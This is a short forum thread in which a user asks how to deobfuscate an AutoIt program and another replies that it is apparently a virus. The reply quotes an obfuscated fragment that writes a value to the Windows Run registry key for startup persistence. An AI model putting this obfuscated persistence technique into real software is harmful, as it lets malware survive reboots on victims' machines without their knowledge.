autoit deobfuscator Help

07/20/2013 15:15 Mishar#1
hello
my question is how to decipher the source

[Only registered and activated users can see links. Click Here To Register...]

[Only registered and activated users can see links. Click Here To Register...]
07/20/2013 17:28 FacePalmMan#2
1. download a decompiler/deobfuscator
2. run it
now you have the source for it.
07/20/2013 22:41 Mishar#3
And what advise and then tried every unpacks
07/21/2013 10:46 FacePalmMan#4
i think its a virus.
Code:
Func _su()
	If $at4 = "1" Then
		$n2d4yapgriwkcu25rkcix79exur_1155 = _0is3l490ejybua32d69l1y9o61($n2d4yapgriwkcu25rkcix79exubb_1_0 & "[COLOR="Red"]nerruC\swodniW\tfosorciM\ERAWTFOS\RES[/COLOR]") ;Backwards SER\SOFTWARE\Microsoft\Windows\Curren (it probably writes something into the startup section of the registry)
		$n2d4yapgriwkcu25rkcix79exur_1154 = "HKEY_CURRENT_U" & $n2d4yapgriwkcu25rkcix79exur_1155 & "Version\Run"
		RegWrite($n2d4yapgriwkcu25rkcix79exur_1154, $n2d4yapgriwkcu25rkcix79exul_i_s1, _0is3l490ejybua32d69l1y9o61("ZS_GER"), $n2d4yapgriwkcu25rkcix79exul_i_s2)
	EndIf
EndFunc
07/21/2013 13:02 Mishar#5
I can not figure out how to decipher the source code